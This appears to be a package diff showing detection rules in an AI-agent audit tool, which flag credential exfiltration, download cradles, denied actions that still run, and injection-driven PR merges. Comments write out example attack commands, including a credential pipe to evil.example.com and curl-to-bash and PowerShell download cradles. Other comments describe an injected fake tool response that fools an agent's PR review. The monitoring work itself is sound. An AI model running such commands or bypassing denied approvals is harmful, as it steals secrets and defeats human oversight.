agentmetry 0.4.0__py3-none-any.whl

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (131) hide show
  1. agentmetry/__init__.py +12 -0
  2. agentmetry/api/__init__.py +0 -0
  3. agentmetry/api/main.py +232 -0
  4. agentmetry/api/routes/__init__.py +0 -0
  5. agentmetry/api/routes/audit.py +396 -0
  6. agentmetry/api/websocket.py +53 -0
  7. agentmetry/api/ws_bridge.py +34 -0
  8. agentmetry/cli/__init__.py +941 -0
  9. agentmetry/cli/__main__.py +5 -0
  10. agentmetry/core/__init__.py +0 -0
  11. agentmetry/core/audit/__init__.py +1 -0
  12. agentmetry/core/audit/adapters/__init__.py +0 -0
  13. agentmetry/core/audit/adapters/agt.py +304 -0
  14. agentmetry/core/audit/adapters/cloudevents.py +159 -0
  15. agentmetry/core/audit/adapters/ecs.py +103 -0
  16. agentmetry/core/audit/adapters/splunk.py +40 -0
  17. agentmetry/core/audit/alerts.py +56 -0
  18. agentmetry/core/audit/canonical.py +150 -0
  19. agentmetry/core/audit/compliance_digest.py +299 -0
  20. agentmetry/core/audit/detection/__init__.py +9 -0
  21. agentmetry/core/audit/detection/benchmark.py +194 -0
  22. agentmetry/core/audit/detection/corpus/attack_approval_denied_then_executed.jsonl +3 -0
  23. agentmetry/core/audit/detection/corpus/attack_arbitrary_host_stage_execute.jsonl +3 -0
  24. agentmetry/core/audit/detection/corpus/attack_autonomous_unapproved_write.jsonl +3 -0
  25. agentmetry/core/audit/detection/corpus/attack_credential_exfil.jsonl +2 -0
  26. agentmetry/core/audit/detection/corpus/attack_credential_then_cloud_api.jsonl +2 -0
  27. agentmetry/core/audit/detection/corpus/attack_destructive_delete_burst.jsonl +6 -0
  28. agentmetry/core/audit/detection/corpus/attack_discovery_then_collect.jsonl +5 -0
  29. agentmetry/core/audit/detection/corpus/attack_dotfile_then_git_push.jsonl +2 -0
  30. agentmetry/core/audit/detection/corpus/attack_encoded_command_download.jsonl +1 -0
  31. agentmetry/core/audit/detection/corpus/attack_env_credential_exfil.jsonl +3 -0
  32. agentmetry/core/audit/detection/corpus/attack_hashed_only_no_command.jsonl +2 -0
  33. agentmetry/core/audit/detection/corpus/attack_interpreter_egress.jsonl +2 -0
  34. agentmetry/core/audit/detection/corpus/attack_pr_merged_without_review.jsonl +2 -0
  35. agentmetry/core/audit/detection/corpus/attack_proc_substitution_cradle.jsonl +2 -0
  36. agentmetry/core/audit/detection/corpus/attack_remote_pipe_to_shell.jsonl +1 -0
  37. agentmetry/core/audit/detection/corpus/attack_remote_staging_then_execute.jsonl +2 -0
  38. agentmetry/core/audit/detection/corpus/attack_session_tool_burst.jsonl +42 -0
  39. agentmetry/core/audit/detection/corpus/attack_single_command_exfil.jsonl +2 -0
  40. agentmetry/core/audit/detection/corpus/attack_ssh_directory_exfil.jsonl +3 -0
  41. agentmetry/core/audit/detection/corpus/attack_subagent_swarm.jsonl +6 -0
  42. agentmetry/core/audit/detection/corpus/attack_timestamp_collision.jsonl +2 -0
  43. agentmetry/core/audit/detection/corpus/attack_untrusted_input_then_action.jsonl +3 -0
  44. agentmetry/core/audit/detection/corpus/benign_authoring_merge_fixtures.jsonl +3 -0
  45. agentmetry/core/audit/detection/corpus/benign_autonomous_after_approval.jsonl +4 -0
  46. agentmetry/core/audit/detection/corpus/benign_build_artifact_cleanup.jsonl +5 -0
  47. agentmetry/core/audit/detection/corpus/benign_ci_artifact_download.jsonl +3 -0
  48. agentmetry/core/audit/detection/corpus/benign_database_migration.jsonl +5 -0
  49. agentmetry/core/audit/detection/corpus/benign_dependency_install_and_build.jsonl +5 -0
  50. agentmetry/core/audit/detection/corpus/benign_download_release_archive.jsonl +4 -0
  51. agentmetry/core/audit/detection/corpus/benign_fetch_data_then_run_repo_script.jsonl +3 -0
  52. agentmetry/core/audit/detection/corpus/benign_fetch_dataset_then_analyse.jsonl +3 -0
  53. agentmetry/core/audit/detection/corpus/benign_fetch_lockfile_then_install.jsonl +3 -0
  54. agentmetry/core/audit/detection/corpus/benign_git_review_and_push.jsonl +6 -0
  55. agentmetry/core/audit/detection/corpus/benign_human_driven_deletes.jsonl +6 -0
  56. agentmetry/core/audit/detection/corpus/benign_local_api_probing.jsonl +5 -0
  57. agentmetry/core/audit/detection/corpus/benign_long_but_calm_session.jsonl +30 -0
  58. agentmetry/core/audit/detection/corpus/benign_loopback_is_not_egress.jsonl +2 -0
  59. agentmetry/core/audit/detection/corpus/benign_loopback_pipe_to_interpreter.jsonl +3 -0
  60. agentmetry/core/audit/detection/corpus/benign_ordinary_development.jsonl +5 -0
  61. agentmetry/core/audit/detection/corpus/benign_package_manager_after_fetch.jsonl +2 -0
  62. agentmetry/core/audit/detection/corpus/benign_reading_config_that_is_not_secret.jsonl +5 -0
  63. agentmetry/core/audit/detection/corpus/benign_remote_api_call_no_credentials.jsonl +4 -0
  64. agentmetry/core/audit/detection/corpus/benign_research_then_docs.jsonl +5 -0
  65. agentmetry/core/audit/detection/corpus/benign_reversed_order_is_not_exfil.jsonl +2 -0
  66. agentmetry/core/audit/detection/corpus/benign_test_and_fix_loop.jsonl +6 -0
  67. agentmetry/core/audit/detection/corpus/benign_writing_about_credentials.jsonl +6 -0
  68. agentmetry/core/audit/detection/corpus/corpus.yaml +443 -0
  69. agentmetry/core/audit/detection/disposition.py +651 -0
  70. agentmetry/core/audit/detection/engine.py +78 -0
  71. agentmetry/core/audit/detection/live.py +127 -0
  72. agentmetry/core/audit/detection/live_store.py +355 -0
  73. agentmetry/core/audit/detection/models.py +53 -0
  74. agentmetry/core/audit/detection/rules.py +1314 -0
  75. agentmetry/core/audit/detection/traits.py +648 -0
  76. agentmetry/core/audit/detection/yaml_config.py +91 -0
  77. agentmetry/core/audit/detection/yaml_rules.py +83 -0
  78. agentmetry/core/audit/dlp/__init__.py +4 -0
  79. agentmetry/core/audit/dlp/loader.py +29 -0
  80. agentmetry/core/audit/dlp/models.py +29 -0
  81. agentmetry/core/audit/dlp/scanner.py +96 -0
  82. agentmetry/core/audit/dogfood.py +398 -0
  83. agentmetry/core/audit/evidence_pack.py +500 -0
  84. agentmetry/core/audit/external.py +213 -0
  85. agentmetry/core/audit/hashing.py +21 -0
  86. agentmetry/core/audit/hook_bootstrap.py +451 -0
  87. agentmetry/core/audit/identity.py +39 -0
  88. agentmetry/core/audit/ingest.py +242 -0
  89. agentmetry/core/audit/migrate.py +73 -0
  90. agentmetry/core/audit/mitre.py +244 -0
  91. agentmetry/core/audit/policy.py +99 -0
  92. agentmetry/core/audit/redaction.py +50 -0
  93. agentmetry/core/audit/replay.py +54 -0
  94. agentmetry/core/audit/run_context.py +129 -0
  95. agentmetry/core/audit/sinks.py +235 -0
  96. agentmetry/core/audit/spool.py +394 -0
  97. agentmetry/core/audit/tool_policy/__init__.py +4 -0
  98. agentmetry/core/audit/tool_policy/evaluator.py +198 -0
  99. agentmetry/core/audit/tool_policy/loader.py +44 -0
  100. agentmetry/core/audit/tool_policy/models.py +25 -0
  101. agentmetry/core/audit/trail_chain.py +300 -0
  102. agentmetry/core/audit/trail_db.py +491 -0
  103. agentmetry/core/audit/trail_merkle.py +332 -0
  104. agentmetry/core/auth.py +54 -0
  105. agentmetry/core/bus/__init__.py +5 -0
  106. agentmetry/core/bus/audit_exporter.py +107 -0
  107. agentmetry/core/bus/bridges.py +26 -0
  108. agentmetry/core/bus/bus.py +102 -0
  109. agentmetry/core/bus/events.py +50 -0
  110. agentmetry/core/bus/outbox.py +124 -0
  111. agentmetry/core/config.py +177 -0
  112. agentmetry/core/diagnostics/__init__.py +0 -0
  113. agentmetry/core/diagnostics/autostart.py +563 -0
  114. agentmetry/core/diagnostics/doctor.py +535 -0
  115. agentmetry/core/diagnostics/driver_paths.py +156 -0
  116. agentmetry/core/diagnostics/env_file.py +45 -0
  117. agentmetry/core/drivers/__init__.py +4 -0
  118. agentmetry/core/drivers/host.py +263 -0
  119. agentmetry/core/drivers/permissions.py +37 -0
  120. agentmetry/core/drivers/spec.py +118 -0
  121. agentmetry/core/extensions.py +107 -0
  122. agentmetry/core/health.py +26 -0
  123. agentmetry/core/version.py +13 -0
  124. agentmetry/policies/detection/manifest.yaml +43 -0
  125. agentmetry/policies/dlp/manifest.yaml +161 -0
  126. agentmetry/policies/opa/agent_rules.rego +33 -0
  127. agentmetry/policies/tool/manifest.yaml +117 -0
  128. agentmetry-0.4.0.dist-info/METADATA +86 -0
  129. agentmetry-0.4.0.dist-info/RECORD +131 -0
  130. agentmetry-0.4.0.dist-info/WHEEL +4 -0
  131. agentmetry-0.4.0.dist-info/entry_points.txt +2 -0
@@ -0,0 +1,1314 @@
1
+ """Behavioral sequence rules.
2
+
3
+ Per-event MITRE tagging (core/audit/mitre.py) says *what* a single tool call is.
4
+ These rules say what a *sequence* of calls means — the signal an EDR/CASB can't
5
+ see because it never had the agent's intent or the session boundary.
6
+
7
+ Each rule is a pure function: ``list[event] (time-ordered) -> list[Detection]``.
8
+ Add a rule by writing a function and appending it to REGISTRY.
9
+ """
10
+
11
+ from __future__ import annotations
12
+
13
+ import logging
14
+ from datetime import datetime, timedelta, timezone
15
+ from typing import Any
16
+
17
+ from .models import Detection
18
+ from .yaml_config import threshold as _threshold
19
+
20
+ # Command-classification regexes live in traits.py, shared with the hook client:
21
+ # the hook computes `tool.traits` labels from the plaintext command before
22
+ # hashing, so these rules can still match when the default privacy config keeps
23
+ # `tool.command` out of the trail entirely. Historical rationale for each
24
+ # pattern (loopback exemption, benign package managers, ...) is documented
25
+ # there. Keep matching logic here in the `command regex OR trait` shape so both
26
+ # logged-command and hashed-only events are covered.
27
+ from .traits import (
28
+ BENIGN_AFTER_STAGING as _BENIGN_AFTER_STAGING,
29
+ CLOUD_API as _CLOUD_API,
30
+ DELETE_COMMAND as _DELETE_COMMAND,
31
+ DOWNLOAD_EXEC as _DOWNLOAD_EXEC,
32
+ ENCODED_CMD as _ENCODED_CMD,
33
+ GIT_EXFIL as _GIT_EXFIL,
34
+ LOOPBACK_IP as _LOOPBACK_IP,
35
+ PIPE_TO_SHELL as _PIPE_TO_SHELL,
36
+ PROC_SUBST_EXEC as _PROC_SUBST_EXEC,
37
+ executed_files as _executed_files,
38
+ fetched_files as _fetched_files,
39
+ mask_literals as _mask_literals,
40
+ pipes_only_loopback as _pipes_only_loopback,
41
+ PR_COMMIT_COMMAND as _PR_COMMIT_COMMAND,
42
+ PR_DESC_COMMAND as _PR_DESC_COMMAND,
43
+ PR_MERGE_COMMAND as _PR_MERGE_COMMAND,
44
+ RAW_IP_URL as _RAW_IP_URL,
45
+ RISKY_EXEC_AFTER_STAGING as _RISKY_EXEC_AFTER_STAGING,
46
+ STAGING_FETCH as _STAGING_FETCH,
47
+ STAGING_HOST as _STAGING_HOST,
48
+ UNTRUSTED_INPUT_COMMAND as _UNTRUSTED_INPUT_COMMAND,
49
+ )
50
+
51
+ logger = logging.getLogger(__name__)
52
+
53
+ #: Timezone names already reported as unresolvable, so the warning fires
54
+ #: once per name rather than once per event.
55
+ _TZ_FALLBACK_WARNED: set[str] = set()
56
+
57
+ # --- safe accessors ----------------------------------------------------------
58
+ # Events are plain dicts read from JSONL; never assume a nested key exists.
59
+
60
+
61
+ def _mitre(event: dict[str, Any]) -> dict[str, Any]:
62
+ tool = event.get("tool")
63
+ if isinstance(tool, dict):
64
+ mitre = tool.get("mitre")
65
+ if isinstance(mitre, dict):
66
+ return mitre
67
+ return {}
68
+
69
+
70
+ def _tactic_id(event: dict[str, Any]) -> str:
71
+ return str(_mitre(event).get("tactic_id") or "")
72
+
73
+
74
+ def _technique_id(event: dict[str, Any]) -> str:
75
+ return str(_mitre(event).get("technique_id") or "")
76
+
77
+
78
+ def _actor_type(event: dict[str, Any]) -> str:
79
+ initiator = event.get("initiator")
80
+ return str(initiator.get("actor_type") or "") if isinstance(initiator, dict) else ""
81
+
82
+
83
+ def _action(event: dict[str, Any]) -> dict[str, Any]:
84
+ action = event.get("action")
85
+ return action if isinstance(action, dict) else {}
86
+
87
+
88
+ def _action_type(event: dict[str, Any]) -> str:
89
+ return str(_action(event).get("type") or "")
90
+
91
+
92
+ def _outcome(event: dict[str, Any]) -> str:
93
+ return str(_action(event).get("outcome") or "")
94
+
95
+
96
+ def _tool_qualified(event: dict[str, Any]) -> str:
97
+ tool = event.get("tool")
98
+ return str(tool.get("qualified") or "") if isinstance(tool, dict) else ""
99
+
100
+
101
+ def _command(event: dict[str, Any]) -> str:
102
+ tool = event.get("tool")
103
+ return str(tool.get("command") or "") if isinstance(tool, dict) else ""
104
+
105
+
106
+ def _command_words(event: dict[str, Any]) -> str:
107
+ """The command with quoted content and heredoc bodies blanked.
108
+
109
+ Use this for anything matching a *command word* -- a verb, a flag, an
110
+ operator. `curl`, `| bash`, `-EncodedCommand`, `gh pr merge`. A command word
111
+ inside quotes is not a command; it is an argument to `echo`.
112
+
113
+ `classify_command` learned this and these rules did not, which left the fix
114
+ half-applied: the hook stopped labelling `echo 'curl x | bash' >> notes.md`
115
+ as a cradle, and then the rules read `tool.command` directly and fired
116
+ anyway. Two code paths answering one question, again.
117
+
118
+ Raw `_command` is still right for extracting URLs and IPs, which are
119
+ arguments and are routinely quoted.
120
+ """
121
+ return _mask_literals(_command(event))
122
+
123
+
124
+ def _input_hash(event: dict[str, Any]) -> str:
125
+ tool = event.get("tool")
126
+ return str(tool.get("input_hash") or "") if isinstance(tool, dict) else ""
127
+
128
+
129
+ def _event_id(event: dict[str, Any]) -> str:
130
+ return str(event.get("event_id") or "")
131
+
132
+
133
+ def _ts(event: dict[str, Any]) -> str:
134
+ return str(event.get("timestamp_utc") or "")
135
+
136
+
137
+ def _correlation_id(events: list[dict[str, Any]]) -> str:
138
+ for event in events:
139
+ cid = event.get("correlation_id")
140
+ if cid:
141
+ return str(cid)
142
+ return ""
143
+
144
+
145
+ def _trigger(event: dict[str, Any]) -> str:
146
+ initiator = event.get("initiator")
147
+ return str(initiator.get("trigger") or "") if isinstance(initiator, dict) else ""
148
+
149
+
150
+ def _norm_tool(name: str) -> str:
151
+ """Same folding core.audit.mitre uses, so `delete_file`/`Delete` agree."""
152
+ return name.lower().replace("_", "").replace("-", "")
153
+
154
+
155
+ def _business_tz(name: str) -> timezone | Any:
156
+ """Resolve the operator's timezone, falling back to UTC if unavailable.
157
+
158
+ The fallback is loud on purpose. Windows ships no IANA timezone database, so
159
+ without the `tzdata` package `ZoneInfo("America/New_York")` raises and this
160
+ silently returned UTC. Every off-hours decision for an operator outside UTC
161
+ was then made against the wrong clock: a 14:00 New York action was reported
162
+ as an out-of-hours event at 18:00, and a genuine 03:00 action could pass as
163
+ business hours. A detection rule quietly using the wrong timezone is worse
164
+ than one that does not run, so say so once.
165
+
166
+ `tzdata` is a declared dependency; this path should now be unreachable.
167
+ """
168
+ if not name or name.upper() == "UTC":
169
+ return timezone.utc
170
+ try:
171
+ from zoneinfo import ZoneInfo
172
+
173
+ return ZoneInfo(name)
174
+ except Exception as exc:
175
+ if name not in _TZ_FALLBACK_WARNED:
176
+ _TZ_FALLBACK_WARNED.add(name)
177
+ logger.warning(
178
+ "Business timezone %r could not be resolved (%s); off-hours "
179
+ "detection is falling back to UTC and its findings will be "
180
+ "wrong for any operator not in UTC. Install `tzdata`.",
181
+ name,
182
+ exc,
183
+ )
184
+ return timezone.utc
185
+
186
+
187
+ def _business_window(spec: str) -> tuple[int, int]:
188
+ """Parse "09-18" into (9, 18). Falls back to 09-18 on anything unparsable."""
189
+ try:
190
+ start_s, end_s = spec.split("-", 1)
191
+ start, end = int(start_s), int(end_s)
192
+ if 0 <= start < end <= 24:
193
+ return start, end
194
+ except (ValueError, AttributeError):
195
+ pass
196
+ return 9, 18
197
+
198
+
199
+ def _to_tz(ts: str, tz: Any) -> datetime | None:
200
+ """Parse a canonical timestamp and convert it into `tz`.
201
+
202
+ Explicit conversion is the whole point: reading `.hour` off the parsed value
203
+ reports the *source* offset, not the operator's clock.
204
+ """
205
+ if not ts:
206
+ return None
207
+ try:
208
+ dt = datetime.fromisoformat(ts.replace("Z", "+00:00"))
209
+ except ValueError:
210
+ return None
211
+ if dt.tzinfo is None:
212
+ dt = dt.replace(tzinfo=timezone.utc) # canonical events are UTC
213
+ return dt.astimezone(tz)
214
+
215
+
216
+ # --- rules -------------------------------------------------------------------
217
+
218
+ # Thresholds are tunable via agentmetry/policies/detection/manifest.yaml (reload on restart).
219
+
220
+ # Exact tool methods that destroy data. Normalized via _norm_tool, so
221
+ # `delete_file`, `deleteFile` and `Delete` all land here, while
222
+ # `remove_whitespace` and `undelete` correctly do not.
223
+ _DELETE_METHODS = frozenset(
224
+ {"delete", "deletefile", "removefile", "rm", "rmdir", "unlink", "rmrf", "destroy"}
225
+ )
226
+
227
+ # Scheduled work runs at night by design; excluded from the off-hours rule.
228
+ _SCHEDULED_TRIGGERS = frozenset({"cron", "schedule", "scheduled", "timer"})
229
+
230
+ # Tools/commands that pull content an outsider can author. ADI's whole premise
231
+ # is that this data is treated as trusted, so anything a session does *after*
232
+ # ingesting it deserves provenance.
233
+ _UNTRUSTED_INPUT_METHODS = frozenset(
234
+ {"webfetch", "websearch", "readissue", "readprdesc", "readprcommit", "readcomments", "browse"}
235
+ )
236
+ # Note the absence of a bare `curl https://...` in UNTRUSTED_INPUT_COMMAND
237
+ # (traits.py). A curl is ambiguous: this engine already models it as egress
238
+ # (TA0011), so counting it as ingestion too made it both halves of this rule,
239
+ # and two ordinary web reads raised an alarm. Only unambiguous content-ingestion
240
+ # vectors belong there.
241
+
242
+ # Techniques that make a post-ingestion action worth flagging. Plain execution
243
+ # is excluded on purpose: "read the issue, then run the tests" is the single
244
+ # most common agent workflow there is, and firing on it would bury the signal.
245
+ _RISKY_TACTICS = frozenset({"TA0006", "TA0011", "TA0010"}) # cred access, C2, exfil
246
+ _RISKY_TECHNIQUES = ("T1552", "T1485", "T1027", "T1105", "T1071")
247
+
248
+ # PR review: reading the description is not reading the code. ADI's supply-chain
249
+ # attack (§4.3) injects a fake tool response so the agent believes it reviewed a
250
+ # commit it never fetched.
251
+ _PR_DESC_METHODS = frozenset({"readprdesc", "readpr", "prview"})
252
+ _PR_COMMIT_METHODS = frozenset({"readprcommit", "prdiff", "readcommit", "prfiles"})
253
+ _PR_MERGE_METHODS = frozenset({"mergepr", "prmerge", "merge"})
254
+
255
+
256
+ def _traits(event: dict[str, Any]) -> frozenset[str]:
257
+ """Hook-side command classification labels (tool.traits), if present."""
258
+ tool = event.get("tool")
259
+ if isinstance(tool, dict):
260
+ raw = tool.get("traits")
261
+ if isinstance(raw, list):
262
+ return frozenset(str(t) for t in raw if t)
263
+ return frozenset()
264
+
265
+
266
+ def _has_trait(event: dict[str, Any], name: str) -> bool:
267
+ return name in _traits(event)
268
+
269
+
270
+ def _is_credential_access(event: dict[str, Any]) -> bool:
271
+ """Either classifier saying so is enough.
272
+
273
+ This used to read the MITRE tag alone, which quietly made the mapper the
274
+ only opinion that counted. When the mapper was wrong -- a bare ".env"
275
+ substring matching a Python module path -- it manufactured the credential
276
+ half of two critical findings while `classify_command` reported no traits at
277
+ all, and nothing in the system could notice the two disagreed (#40).
278
+
279
+ Reading both is not belt and braces. The trait is computed in the hook where
280
+ the plaintext still exists, and the tag can be recomputed later from
281
+ whatever evidence survived redaction; an event that kept only one of them is
282
+ normal rather than suspicious.
283
+ """
284
+ return _technique_id(event).startswith("T1552") or _has_trait(
285
+ event, "credential_access"
286
+ ) or _has_trait(event, "private_key")
287
+
288
+
289
+ def _is_staging_fetch(event: dict[str, Any]) -> bool:
290
+ cmd = _command(event)
291
+ if cmd:
292
+ # Host from the raw text (a URL is an argument and is often quoted),
293
+ # fetch verb from the masked text (a verb in quotes is not a verb).
294
+ if not _STAGING_HOST.search(cmd):
295
+ return False
296
+ words = _command_words(event)
297
+ return bool(_STAGING_FETCH.search(words) or _DOWNLOAD_EXEC.search(words))
298
+ return _has_trait(event, "staging_fetch")
299
+
300
+
301
+ def _is_risky_exec_after_staging(event: dict[str, Any]) -> bool:
302
+ if _action_type(event) != "tool_called" or _outcome(event) != "success":
303
+ return False
304
+ cmd = _command(event)
305
+ if not cmd:
306
+ return _has_trait(event, "risky_exec")
307
+ words = _command_words(event)
308
+ if _BENIGN_AFTER_STAGING.search(words):
309
+ return False
310
+ if _PIPE_TO_SHELL.search(words) or _PROC_SUBST_EXEC.search(words):
311
+ return True
312
+ return bool(_RISKY_EXEC_AFTER_STAGING.search(words))
313
+
314
+
315
+ def rule_credential_exfil(events: list[dict[str, Any]]) -> list[Detection]:
316
+ """Credential access (T1552) then network egress (TA0011) in one session.
317
+
318
+ The read-a-secret-then-phone-home pattern. Critical: this is exfiltration of
319
+ exactly the data a SOC cares about, and no single event looks like an alert.
320
+ """
321
+ # One command can be both halves. `cat ~/.aws/credentials | curl -d @-
322
+ # https://evil.example.com` is complete exfiltration in a single event, and
323
+ # the loop below only ever looked at events *after* the credential read, so
324
+ # it found nothing (#42). The shorter way to do this is also the more likely
325
+ # one, which made it the wrong thing to miss.
326
+ #
327
+ # Content upgrades return one technique and credential access outranks C2,
328
+ # so the egress half cannot be read off the MITRE tag here. It is a trait.
329
+ for event in events:
330
+ if not _is_credential_access(event):
331
+ continue
332
+ if not _has_trait(event, "net_egress"):
333
+ continue
334
+ if _action_type(event) != "tool_called" or _outcome(event) != "success":
335
+ continue
336
+ return [
337
+ Detection(
338
+ rule_id="credential-exfil",
339
+ title="Credential access followed by network egress",
340
+ severity="critical",
341
+ summary=(
342
+ f"{_tool_qualified(event) or 'A tool'} read credentials and sent "
343
+ "them off the machine in a single command."
344
+ ),
345
+ correlation_id=_correlation_id(events),
346
+ tactic_ids=["TA0006", "TA0011"],
347
+ technique_ids=[_technique_id(event) or "T1552.001", "T1071.001"],
348
+ event_ids=[_event_id(event)],
349
+ first_seen_utc=_ts(event),
350
+ last_seen_utc=_ts(event),
351
+ )
352
+ ]
353
+
354
+ cred_idx = next(
355
+ (i for i, e in enumerate(events) if _is_credential_access(e)),
356
+ None,
357
+ )
358
+ if cred_idx is None:
359
+ return []
360
+
361
+ for net in events[cred_idx + 1:]:
362
+ if _tactic_id(net) == "TA0011":
363
+ cred = events[cred_idx]
364
+ return [
365
+ Detection(
366
+ rule_id="credential-exfil",
367
+ title="Credential access followed by network egress",
368
+ severity="critical",
369
+ summary=(
370
+ f"{_tool_qualified(cred) or 'a tool'} accessed credentials, then "
371
+ f"{_tool_qualified(net) or 'a tool'} egressed to the network in the "
372
+ "same session."
373
+ ),
374
+ correlation_id=_correlation_id(events),
375
+ tactic_ids=["TA0006", "TA0011"],
376
+ technique_ids=[_technique_id(cred), _technique_id(net)],
377
+ event_ids=[_event_id(cred), _event_id(net)],
378
+ first_seen_utc=_ts(cred),
379
+ last_seen_utc=_ts(net),
380
+ )
381
+ ]
382
+ return []
383
+
384
+
385
+ def rule_autonomous_unapproved_write(events: list[dict[str, Any]]) -> list[Detection]:
386
+ """Autonomous agent performs an Impact action with no human approval first.
387
+
388
+ The flagship "no default self-approve" story: an agent running on its own
389
+ (cron/vault_watch/ingress) wrote, edited, or deleted before any human
390
+ approval_response landed in the session. A granted approval resets the gate.
391
+ """
392
+ offending: list[dict[str, Any]] = []
393
+ approved = False
394
+ for event in events:
395
+ if _action_type(event) == "approval_response" and _outcome(event) == "success":
396
+ approved = True
397
+ continue
398
+ if (
399
+ not approved
400
+ and _action_type(event) == "tool_called"
401
+ and _outcome(event) == "success"
402
+ and _tactic_id(event) == "TA0040"
403
+ and _actor_type(event) == "autonomous"
404
+ ):
405
+ offending.append(event)
406
+
407
+ if not offending:
408
+ return []
409
+
410
+ return [
411
+ Detection(
412
+ rule_id="autonomous-unapproved-write",
413
+ title="Autonomous write without human approval",
414
+ severity="high",
415
+ summary=(
416
+ f"{len(offending)} impact action(s) (write/edit/delete) by an autonomous "
417
+ "agent with no human approval in the session."
418
+ ),
419
+ correlation_id=_correlation_id(events),
420
+ tactic_ids=["TA0040"],
421
+ technique_ids=sorted({_technique_id(e) for e in offending if _technique_id(e)}),
422
+ event_ids=[_event_id(e) for e in offending],
423
+ first_seen_utc=_ts(offending[0]),
424
+ last_seen_utc=_ts(offending[-1]),
425
+ )
426
+ ]
427
+
428
+
429
+ def rule_discovery_then_collect(events: list[dict[str, Any]]) -> list[Detection]:
430
+ """A burst of Discovery (TA0007) then Collection/Credential-Access — recon.
431
+
432
+ Enumerating the filesystem and then reading files is the classic recon-then-
433
+ grab shape. Medium: benign on its own, meaningful as a lead-in.
434
+ """
435
+ burst: list[dict[str, Any]] = []
436
+ for event in events:
437
+ tactic = _tactic_id(event)
438
+ if tactic == "TA0007":
439
+ burst.append(event)
440
+ elif tactic in ("TA0009", "TA0006") and len(burst) >= _threshold("discovery_burst"):
441
+ collect = event
442
+ technique_ids = sorted({_technique_id(e) for e in burst if _technique_id(e)})
443
+ if _technique_id(collect):
444
+ technique_ids.append(_technique_id(collect))
445
+ return [
446
+ Detection(
447
+ rule_id="discovery-then-collect",
448
+ title="Filesystem recon followed by data collection",
449
+ severity="medium",
450
+ summary=(
451
+ f"{len(burst)} discovery calls preceded {_tool_qualified(collect) or 'a read'} "
452
+ "collecting data in the same session."
453
+ ),
454
+ correlation_id=_correlation_id(events),
455
+ tactic_ids=["TA0007", tactic],
456
+ technique_ids=technique_ids,
457
+ event_ids=[_event_id(e) for e in burst] + [_event_id(collect)],
458
+ first_seen_utc=_ts(burst[0]),
459
+ last_seen_utc=_ts(collect),
460
+ )
461
+ ]
462
+ return []
463
+
464
+
465
+ def rule_approval_denied_then_executed(events: list[dict[str, Any]]) -> list[Detection]:
466
+ """A human denied a gated action, and the exact same action executed successfully later.
467
+
468
+ Two precision constraints, both learned from real dogfood trails:
469
+
470
+ * Only explicit denials count. Ingest synthesizes `denied` approval
471
+ responses for asks still pending at session_end (reason `inferred:...`).
472
+ That is bookkeeping for a prompt nobody answered, not a human saying no,
473
+ and treating it as a denial convicted every later call of the same tool —
474
+ twelve criticals on one ordinary Cursor session.
475
+ * The denial binds to the execution by the most specific identity both
476
+ events share: input_hash, else the command string, else the qualified
477
+ tool name. `shell.run` names every shell command there is, so a bare
478
+ name match marked unrelated commands as guardrail bypasses.
479
+ """
480
+ denied: list[dict[str, Any]] = []
481
+ detections: list[Detection] = []
482
+
483
+ for event in events:
484
+ action_type = _action_type(event)
485
+ outcome = _outcome(event)
486
+
487
+ if action_type == "approval_response" and outcome == "denied":
488
+ if str(_action(event).get("reason") or "").startswith("inferred:"):
489
+ continue
490
+ tool_name = _tool_qualified(event)
491
+ input_hash = _input_hash(event)
492
+ gated = event.get("gated_action")
493
+ if isinstance(gated, dict):
494
+ tool_name = tool_name or str(gated.get("tool") or "")
495
+ input_hash = input_hash or str(gated.get("input_hash") or "")
496
+ if tool_name:
497
+ denied.append(
498
+ {
499
+ "tool": tool_name,
500
+ "input_hash": input_hash,
501
+ "command": _command(event),
502
+ "event": event,
503
+ }
504
+ )
505
+
506
+ elif action_type == "tool_called" and outcome == "success":
507
+ tool_name = _tool_qualified(event)
508
+ if not tool_name:
509
+ continue
510
+ exec_hash = _input_hash(event)
511
+ exec_cmd = _command(event)
512
+ for i, entry in enumerate(denied):
513
+ if entry["tool"] != tool_name:
514
+ continue
515
+ if entry["input_hash"] and exec_hash:
516
+ if entry["input_hash"] != exec_hash:
517
+ continue
518
+ elif entry["command"] and exec_cmd:
519
+ if entry["command"] != exec_cmd:
520
+ continue
521
+ denial = entry["event"]
522
+ detections.append(
523
+ Detection(
524
+ rule_id="approval-denied-then-executed",
525
+ title="Denied action was executed",
526
+ severity="critical",
527
+ summary=(
528
+ f"Tool '{tool_name}' was successfully executed after being explicitly "
529
+ "denied earlier in the session."
530
+ ),
531
+ correlation_id=_correlation_id(events),
532
+ tactic_ids=["TA0005"],
533
+ technique_ids=[],
534
+ event_ids=[_event_id(denial), _event_id(event)],
535
+ first_seen_utc=_ts(denial),
536
+ last_seen_utc=_ts(event),
537
+ )
538
+ )
539
+ denied.pop(i)
540
+ break
541
+
542
+ return detections
543
+
544
+
545
+ def rule_encoded_command_download(events: list[dict[str, Any]]) -> list[Detection]:
546
+ """A command pulls a payload from a raw IP, often via an obfuscated one-liner.
547
+
548
+ `powershell -EncodedCommand ...` or `IEX (New-Object Net.WebClient).
549
+ DownloadString('http://185.220.101.5/a.ps1')` is a textbook download cradle:
550
+ fetch and execute code from a bare IP address, no domain, no package manager.
551
+ Critical, and it fires on a single event because the command itself is the
552
+ tell.
553
+ """
554
+ for event in events:
555
+ cmd = _command(event)
556
+ if cmd:
557
+ words = _command_words(event)
558
+ # The IP is an argument and may be quoted; the fetch verb may not.
559
+ remote_ips = [ip for ip in _RAW_IP_URL.findall(cmd) if not _LOOPBACK_IP.match(ip)]
560
+ raw_ip_fetch = bool(remote_ips and _DOWNLOAD_EXEC.search(words))
561
+ # Piping a fetch into an interpreter is a cradle whatever the host is.
562
+ # Requiring a bare IP let `curl https://evil-cdn.example.com/x.sh | bash`
563
+ # straight through, which is what a real attacker actually uses.
564
+ # Process substitution is the same cradle without a pipe. The
565
+ # trait classifier learned `bash <(curl ...)`; this branch reads the
566
+ # command text directly and would have kept missing it, which is the
567
+ # duplicate-classifier problem one layer down from #40.
568
+ piped_any = bool(_PIPE_TO_SHELL.search(words) or _PROC_SUBST_EXEC.search(words))
569
+ piped_local = piped_any and _pipes_only_loopback(cmd)
570
+ piped = piped_any and not piped_local
571
+ encoded = bool(_ENCODED_CMD.search(words))
572
+ else:
573
+ # Default privacy config: no command text — match hook-side labels.
574
+ raw_ip_fetch = _has_trait(event, "raw_ip_fetch")
575
